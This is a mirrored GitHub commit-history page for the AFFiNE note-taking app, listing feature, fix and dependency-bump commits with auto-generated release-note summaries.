mirror of
https://github.com/toeverything/AFFiNE.git
synced 2026-02-04 08:38:34 +00:00
50507fc9bfc0a9be3198df65bb6126387776ceef
10962 Commits
| Author | SHA1 | Message | Date | |
|---|---|---|---|---|
|
|
46e7d9fab7 |
chore: bump electron (#13935)
fix #13647 <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit ## Release Notes * **Chores** * Updated development tooling and build dependencies to latest stable versions * Increased minimum Node.js requirement to version 22 * Updated macOS deployment target to version 11.6 * Enhanced type safety and error handling in build processes <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
17ec76540b |
feat(editor): import docs from docx (#11774)
Support importing .docx files, as mentioned in https://github.com/toeverything/AFFiNE/issues/10154#issuecomment-2655744757 It essentially uses mammoth to convert the docx to html, and then imports the html with the standard steps. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Import Microsoft Word (.docx) files directly via the import dialog (creates new documents). * .docx added as a selectable file type in the file picker and import options. * **Localization** * Added localized labels and tooltips for DOCX import in English, Simplified Chinese, and Traditional Chinese. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
e5db0e66c1 | chore: update schema | ||
|
|
525b65c6ca |
fix(server): config typo (#13913)
Fix a typo on the SMTP configuration page |
||
|
|
c302425a05 | fix(server): doc squash timeout (#13939) | ||
|
|
abe73e9996 |
fix: config escape error (#13936)
fix #13702 |
||
|
|
e379da200e |
feat(editor): add collapse/expand toggle for groups with caching (#12671)
https://github.com/user-attachments/assets/4ef71704-57bb-45b8-9e73-8a51c67fb158 Adds a collapsible toggle for group-by groups. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - **New Features** - Collapsible groups for desktop and mobile table views with persistent per-view collapsed state and a keyboard-accessible toggle button. - **Bug Fixes** - Group title icons now render consistently across variants. - **Tests** - Added unit tests verifying collapse/expand behavior for group components. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: 3720 <zuozijian1994@gmail.com> Co-authored-by: L-Sun <zover.v@gmail.com> |
||
|
|
6ec1948f62 |
feat(editor): release callout (#13896)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Callout is no longer gated as an experimental option — it now consistently appears in the editor’s slash menu and toolbar where applicable. * **Tests** * End-to-end slash-menu tests updated to expect the Callout item in search results and adjusted item ordering. * **Chores** * Repository ignore rules updated to exclude .kiro files. <!-- end of auto-generated comment: release notes by coderabbit.ai -->v0.25.4 |
||
|
|
7e6ead4232 | feat: native doc reader (#13881) | ||
|
|
02dcfdcc40 |
chore(native): remove unused deps (#13854)
Identified some unused dependencies and refactored them. |
||
|
|
5a2f508dac |
feat(editor): hidden 'add icon' label on print if icon is not set (#13868)
This caption (see screenshot) is added when you try to print doc, even if there is no icon. <img width="1269" height="897" alt="изображение" src="https://github.com/user-attachments/assets/d63383e6-48a2-44fb-8f32-ae91d1e9e8c6" /> |
||
|
|
2bd9f1a353 |
feat: implement tray and minimize behaviors (#13851)
This PR introduces new window behaviors, which can be enabled when the menubar setting is active: New Features: - Quick open from tray icon - Minimize to tray - Exit to tray - Start minimized These changes have not yet been tested on macOS. <img width="645" height="479" alt="image" src="https://github.com/user-attachments/assets/7bdd13d0-5322-45a4-8e71-85c081aa0c86" /> <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Configurable menubar/tray behaviors: open on left-click, minimize to tray, close to tray (exit to tray), and start minimized. * **UI** * Appearance settings add a Menubar → Window Behavior group with four toggles; group shows only when menubar/tray is enabled (hidden on macOS). * **Settings** * Tray settings persisted and exposed via the settings API with getters and setters for each option. * **Localization** * Added translation keys and English strings for the new controls and descriptions. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: Peng Xiao <pengxiao@outlook.com> |
||
|
|
9f6ea83ac1 |
fix(editor): linked doc popover close when layout is switched (#13867)
Fixing the disappearing linked doc menu called by @ when switching language using Alt+Shift. |
||
|
|
d33df659f8 | feat: check server type in chat (#13875) | ||
|
|
c9a4129a3e | fix: a security issue related to open external (#13864) | ||
|
|
dd676611ce | test: fix mock api v0.25.3-beta.0 v0.25.3 | ||
|
|
f3bb2be5ef | feat: request apply subscription mutation (#13844) | ||
|
|
8535b3dc41 | feat(server): refresh subscription if event is from anonymous account (#13840) | ||
|
|
89cc9b072b |
feat(server): early subscription for iap (#13826)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a mutation to request/apply a subscription by transaction ID (client mutation and server operation), returning subscription details. * **Bug Fixes / Improvements** * More robust external subscription sync with safer conflict detection, optional short-lived confirmation, improved parsing and error logging. * **Chores** * Standardized time constants for clarity. * **Tests** * Updated subscription test data (expiration date) to reflect new lifecycle expectations. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
e4b5b24fdd | chore: bump package version | ||
|
|
9904f50e0b |
feat(server): improve crypto (#13822)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Bug Fixes** * Resolved cryptographic compatibility issues with OpenSSL 3.x. * **New Features** * Broader support for multiple key types for signing and verification. * OTP generation adjusted (affects digit distribution/values). * **Refactor** * Internal cryptographic key handling reworked for improved stability, compatibility, and multi-key-type support. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
b7ac7caab4 |
chore(server): improve transcript stability (#13821)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Enhanced audio/video detection for MP4 files to better distinguish audio-only vs. video. * **Dependencies** * Added MP4 parsing dependency and updated AI provider libraries (Anthropic, Google, OpenAI, etc.). * **Bug Fixes** * Tightened authentication state validation for magic-link/OTP flows. * Stricter space-join validation to reject invalid client types/versions. * Improved transcript entry deduplication and data handling. * **API** * Transcript submit payload now requires infos and removes deprecated url/mimeType fields. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
d74087fdc5 |
fix(blocksuite): stabilize cross-document clipboard snapshot handling (#13817)
This PR addresses issue Fixes: #13805 (cross-document copy/paste not working). Locally verified that: - Copy → paste between two documents now works consistently. - Clipboard snapshot payload remains intact when encoded/decoded. - External paste (e.g., to Notepad or browser text field) functions correctly. E2E tests for clipboard behavior were added, but Playwright browsers could not be installed in the container (`HTTP 403` from CDN). Manual verification confirms the fix works as intended. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Tests** * Added cross-document clipboard regression tests for copy/paste between documents, external clipboard validation, and multi-block copy; duplicate test entries noted. * **Chores** * Minor formatting and whitespace cleanup around clipboard handling. * Improved error handling in paste flows. * Standardized HTML formatting for clipboard payload attributes. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
875565d08a |
fix(server): avoid a snowball effect of email sending failures (#13818)
fix #13802 |
||
|
|
0ecd915245 | docs: update readme | ||
|
|
b5ebd20314 |
fix(core): prevent container privilege escalation in .devcontainer/docker-compose.yml (#13814)
**Context and Purpose:** This PR automatically remediates a security vulnerability: - **Description:** Service 'app' allows for privilege escalation via setuid or setgid binaries. Add 'no-new-privileges:true' in 'security_opt' to prevent this. - **Rule ID:** yaml.docker-compose.security.no-new-privileges.no-new-privileges - **Severity:** HIGH - **File:** .devcontainer/docker-compose.yml - **Lines Affected:** 4 - 4 This change is necessary to protect the application from potential security risks associated with this vulnerability. **Solution Implemented:** The automated remediation process has applied the necessary changes to the affected code in `.devcontainer/docker-compose.yml` to resolve the identified issue. Please review the changes to ensure they are correct and integrate as expected. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Chores** * Enhanced security configuration for the development environment. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
c102e2454f |
feat(server): fetch missing field from rcat (#13794)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Performance** * Added caching mechanism for subscription product data to reduce API calls and improve response times. * **Improvements** * Enhanced asynchronous processing of subscription entitlements for more reliable product data retrieval from the payment provider. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
5fc3258a3d |
feat(server): expose mail server name config in admin dashboard (#13792)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added SMTP name configuration field to notification settings. <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
1a9863d36f |
chore: bump up opentelemetry (#12651)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`^0.35.4` -> `^0.36.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.35.5/0.36.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | 
[@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.47.0` -> `^0.55.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.47.1/0.55.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.44.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.44.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.46.0` -> `^0.54.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.46.1/0.54.0) | [](https://docs.renovatebot.com/merge-confidence/) | 
[](https://docs.renovatebot.com/merge-confidence/) | | [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.57.0` -> `^0.207.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.57.2/0.207.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>open-telemetry/opentelemetry-js (@​opentelemetry/exporter-prometheus)</summary> ### [`v0.207.0`]( |
||
|
|
35c2ad262f |
chore: bump next from 15.3.2 to 15.5.4 (#13739)
Bumps [next](https://github.com/vercel/next.js) from 15.3.2 to 15.5.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/vercel/next.js/releases">next's releases</a>.</em></p> <blockquote> <h2>v15.5.4</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: ensure onRequestError is invoked when otel enabled (<a href="https://redirect.github.com/vercel/next.js/issues/83343">#83343</a>)</li> <li>fix: devtools initial position should be from next config (<a href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)</li> <li>[devtool] fix overlay styles are missing (<a href="https://redirect.github.com/vercel/next.js/issues/83721">#83721</a>)</li> <li>Turbopack: don't match dynamic pattern for node_modules packages (<a href="https://redirect.github.com/vercel/next.js/issues/83176">#83176</a>)</li> <li>Turbopack: don't treat metadata routes as RSC (<a href="https://redirect.github.com/vercel/next.js/issues/82911">#82911</a>)</li> <li>[turbopack] Improve handling of symlink resolution errors in track_glob and read_glob (<a href="https://redirect.github.com/vercel/next.js/issues/83357">#83357</a>)</li> <li>Turbopack: throw large static metadata error earlier (<a href="https://redirect.github.com/vercel/next.js/issues/82939">#82939</a>)</li> <li>fix: error overlay not closing when backdrop clicked (<a href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)</li> <li>Turbopack: flush Node.js worker IPC on error (<a href="https://redirect.github.com/vercel/next.js/issues/84077">#84077</a>)</li> </ul> <h3>Misc Changes</h3> <ul> <li>[CNA] use linter preference (<a href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)</li> <li>CI: use KV for test timing data (<a 
href="https://redirect.github.com/vercel/next.js/issues/83745">#83745</a>)</li> <li>docs: september improvements and fixes (<a href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/yiminghe"><code>@yiminghe</code></a>, <a href="https://github.com/huozhi"><code>@huozhi</code></a>, <a href="https://github.com/devjiwonchoi"><code>@devjiwonchoi</code></a>, <a href="https://github.com/mischnic"><code>@mischnic</code></a>, <a href="https://github.com/lukesandberg"><code>@lukesandberg</code></a>, <a href="https://github.com/ztanner"><code>@ztanner</code></a>, <a href="https://github.com/icyJoseph"><code>@icyJoseph</code></a>, <a href="https://github.com/leerob"><code>@leerob</code></a>, <a href="https://github.com/fufuShih"><code>@fufuShih</code></a>, <a href="https://github.com/dwrth"><code>@dwrth</code></a>, <a href="https://github.com/aymericzip"><code>@aymericzip</code></a>, <a href="https://github.com/obendev"><code>@obendev</code></a>, <a href="https://github.com/molebox"><code>@molebox</code></a>, <a href="https://github.com/OoMNoO"><code>@OoMNoO</code></a>, <a href="https://github.com/pontasan"><code>@pontasan</code></a>, <a href="https://github.com/styfle"><code>@styfle</code></a>, <a href="https://github.com/HondaYt"><code>@HondaYt</code></a>, <a href="https://github.com/ryuapp"><code>@ryuapp</code></a>, <a href="https://github.com/lpalmes"><code>@lpalmes</code></a>, and <a href="https://github.com/ijjk"><code>@ijjk</code></a> for helping!</p> <h2>v15.5.3</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. 
It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: validation return types of pages API routes (<a href="https://redirect.github.com/vercel/next.js/issues/83069">#83069</a>)</li> <li>fix: relative paths in dev in validator.ts (<a href="https://redirect.github.com/vercel/next.js/issues/83073">#83073</a>)</li> <li>fix: remove satisfies keyword from type validation to preserve old TS compatibility (<a href="https://redirect.github.com/vercel/next.js/issues/83071">#83071</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/bgub"><code>@bgub</code></a> for helping!</p> <h2>v15.5.2</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: disable unknownatrules lint rule entirely (<a href="https://redirect.github.com/vercel/next.js/issues/83059">#83059</a>)</li> <li>revert: add ?dpl to fonts in /_next/static/media (<a href="https://redirect.github.com/vercel/next.js/issues/83062">#83062</a>)</li> </ul> <h3>Credits</h3> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href=" |
||
|
|
a0613b6306 |
feat(core): enhance Notion import with folder hierarchy and page icons (#13692)
Hi 👋 Love what you're doing with AFFiNE, I found my Notion replacement in this app. Coming from Notion and importing my workspaces, I saw the need to improve the import functionality to replicate the folder hierarchy from Notion into the AFFiNE folder structure in the `Organize` section. There are a few issues(i.e. #12961 and #13629 ) of people that expected the same behavior. This should make it a lot easier for people to move over. ### Technical description Improve Notion import functionality to preserve organizational structure and page icons from exports: - Add folder hierarchy preservation during Notion import - Extract and set page icons (emoji and image) from Notion HTML - Integrate with OrganizeService to recreate folder structure - Use ExplorerIconService to apply page icons to imported documents - Tested using production workspace exports from Notion, several thousand pages and multiple hierarchy levels deep. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit - New Features - Imports from Notion/HTML now recreate folder hierarchies and link imported pages into that structure. - Page icons (emoji and supported images) are extracted and attached to imported pages. - Import results now include the created root folder for quick access. - Improvements - Import flows integrate folder creation and icon assignment with non-blocking error handling. - Bug Fixes - Avoids including undefined page IDs in successful imports. <!-- end of auto-generated comment: release notes by coderabbit.ai --> --------- Co-authored-by: DarkSky <darksky2048@gmail.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
c18840038f |
chore: bump up @sentry/electron version to v7 (#13652)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@sentry/electron](https://redirect.github.com/getsentry/sentry-electron) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/6.6.0/7.2.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>getsentry/sentry-electron (@​sentry/electron)</summary> ### [`v7.2.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#720) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.1...7.2.0) - feat: Update JavaScript SDKs from [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) to [v10.17.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.17.0) - feat: Log os and device attributes ([#​1246](https://redirect.github.com/getsentry/sentry-electron/issues/1246)) ### [`v7.1.1`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#711) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.0...7.1.1) - fix: Preload injection path ([#​1243](https://redirect.github.com/getsentry/sentry-electron/issues/1243)) - fix: Preload `contextIsolation` issues ([#​1244](https://redirect.github.com/getsentry/sentry-electron/issues/1244)) - fix: Include `sentry.origin` with auto-generated logs ([#​1241](https://redirect.github.com/getsentry/sentry-electron/issues/1241)) ### [`v7.1.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#710) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.0.0...7.1.0) - feat: Update JavaScript SDKs from [v10.7.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.7.0) to [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) 
([#​1236](https://redirect.github.com/getsentry/sentry-electron/issues/1236)) - feat: Optional Namespaced IPC ([#​1234](https://redirect.github.com/getsentry/sentry-electron/issues/1234)) - fix: Export `ErrorEvent` type ([#​1229](https://redirect.github.com/getsentry/sentry-electron/issues/1229)) - fix: Only capture logs if `enableLogs` is true ([#​1235](https://redirect.github.com/getsentry/sentry-electron/issues/1235)) ### [`v7.0.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#700) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.11.0...7.0.0) This release updates the underlying Sentry JavaScript SDKs to v10 which includes some breaking changes. Check out the the [migration guide](./MIGRATION.md) for more details. - feat: Update JavaScript SDKs to v10.8.0 ([#​1205](https://redirect.github.com/getsentry/sentry-electron/issues/1205)) ### [`v6.11.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6110) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.10.0...6.11.0) - feat: Update JavaScript SDKs from [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) to [v9.46.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.46.0) - fix: Ensure native directory ends up in package ([#​1216](https://redirect.github.com/getsentry/sentry-electron/issues/1216)) ### [`v6.10.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6100) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.9.0...6.10.0) - feat: Update JavaScript SDKs from [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) to [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) - fix: Don't use `deepmerge` to merge events to remove circular ref. 
issues ([#​1210](https://redirect.github.com/getsentry/sentry-electron/issues/1210)) - fix: Support `node16` for TypeScript `moduleResolution` ([#​1203](https://redirect.github.com/getsentry/sentry-electron/issues/1203)) ### [`v6.9.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#690) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.8.0...6.9.0) - feat: Update JavaScript SDKs from [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) to [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) - feat: Add `eventLoopBlockIntegration` ([#​1188](https://redirect.github.com/getsentry/sentry-electron/issues/1188)) - feat: Move renderer event loop block detection to an integration ([#​1196](https://redirect.github.com/getsentry/sentry-electron/issues/1196)) ### [`v6.8.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#680) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.7.0...6.8.0) - feat: Update JavaScript SDKs from [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) to [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) - fix: Don't capture stack traces from destroyed renderers ([#​1165](https://redirect.github.com/getsentry/sentry-electron/issues/1165)) ### [`v6.7.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#670) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.6.0...6.7.0) - feat: Update JavaScript SDKs from [v9.18.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.18.0) to [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) - feat: Add structured logging support ([#​1159](https://redirect.github.com/getsentry/sentry-electron/issues/1159)) </details> --- ### Configuration 📅 **Schedule**: 
Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzAuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
e2de0e0e3d |
fix(editor): add trash state for linked-doc and synced-doc appearance (#13767)
This PR updates the appearance of `embed-linked-doc-block` and `embed-synced-doc-block` to reflect the trashed state of their linked documents. Previously, these blocks showed no visual difference whether the linked document was trashed or not, despite the existing of codes for deletion-related appearance. This change ensures that the deletion appearance is properly displayed.  <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Documents now support trash state tracking for improved deletion management * **Bug Fixes** * Improved synchronization and refresh of embedded documents when document states change * Enhanced handling of trashed documents in embedded content <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
6fb0ff9177 |
chore(native): simplify Array::get method with functional approach (#13771)
## Issue The Array::get method used verbose nested Option handling with redundant returns, making the code longer and less Rust idiomatic. ## Solution Replaced the nested if let structure with a functional and_then approach that: - Eliminates redundant return keyword usage - Flattens Option handling for cleaner logic - Reduces code from 13 lines to 9 lines - Maintains identical functionality ## Result More idiomatic Rust code that's easier to read and maintain, with all tests passing. <!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **Refactor** * Improved internal code structure with functional programming patterns for enhanced maintainability. No visible changes to end-user functionality. <!-- end of auto-generated comment: release notes by coderabbit.ai --> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> |
||
|
|
c2fb6adfd8 |
feat(mobile): add discord link in setting (#13789)
<!-- This is an auto-generated comment: release notes by coderabbit.ai --> ## Summary by CodeRabbit * **New Features** * Added a new Discord community link in the mobile settings Others section with an animated "Hot" badge * **Localization** * Added multilingual support for the new Discord link across all supported languages <!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
8aeb8bd0ca |
feat(ios): insert app user id to rc (#13756)
This pull request integrates RevenueCat into the iOS paywall system, enabling user authentication and subscription management through the RevenueCat SDK. It introduces new dependencies, updates the paywall plugin initialization, and adds logic to fetch and use the current user identifier from the web context for RevenueCat login.

The most important changes are grouped below:

**RevenueCat Integration and Configuration:**

* Added `purchases-ios-spm` (RevenueCat) as a Swift Package dependency in `AffinePaywall` and updated `Package.resolved` to track the new dependency. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Package.swift`, `packages/frontend/apps/ios/App/App.xcworkspace/xcshareddata/swiftpm/Package.resolved`) [[1]](diffhunk://#diff-7716c691e65a220dad542e024fbf91547c45ea69ddff1d0b6a002a497cd7c8ecR20-R28) [[2]](diffhunk://#diff-63609de9bdfc08b8a0691a4f0ddb7ddff07ae76b40ec2ee7c12adb7db226eb3cR48-R56)
* Implemented `Paywall.setup()` for initializing RevenueCat configuration, including setting log level, proxy URL, and a static API key. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Paywall.swift`, `packages/frontend/apps/ios/App/Plugins/PayWall/PayWallPlugin.swift`) [[1]](diffhunk://#diff-bce0a21a4e7695b7bf2430cd6b8a85fbc84124cc3be83f3288119992b7abb6cdR8-R30) [[2]](diffhunk://#diff-1854d318d8fd8736d078f5960373ed440836263649a8193c8ee33e72a99424edR14)

**User Authentication and Subscription State:**

* Enhanced the paywall ViewModel logic to fetch the current user identifier from the web context (`window.getCurrentUserIdentifier`), configure RevenueCat, and log in the user before fetching subscription state. Improved error handling and ensured external entitlement fetching is robust. (`packages/frontend/apps/ios/App/Packages/AffinePaywall/Sources/AffinePaywall/Model/ViewModel+Action.swift`) [[1]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR9) [[2]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbL120-R155) [[3]](diffhunk://#diff-df2cb61867b4ff10dee98d534cf3c94fe8d48ebaef3f219450a9fba26725fdcbR165)
* Added a global JavaScript function `getCurrentUserIdentifier` to the iOS web context to retrieve the current user's account ID for use in RevenueCat login. (`packages/frontend/apps/ios/src/app.tsx`)

**Project Metadata:**

* Downgraded the `objectVersion` in the Xcode project file, possibly to maintain compatibility with other tools or environments. (`packages/frontend/apps/ios/App/App.xcodeproj/project.pbxproj`)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit
* **New Features**
  * Paywall now initializes automatically for a smoother subscription flow.
  * New global API to retrieve the current user identifier from the app context.
* **Improvements**
  * Added integration to better coordinate subscription/login state before showing paywall options.
  * Ensures user identity is validated prior to entitlement checks, improving accuracy.
  * Improved error messages and logging during purchase/login flows.
* **Bug Fixes**
  * Fixed intermittent issues where subscription status could fail to load or appear outdated.
<!-- end of auto-generated comment: release notes by coderabbit.ai --> |
||
|
|
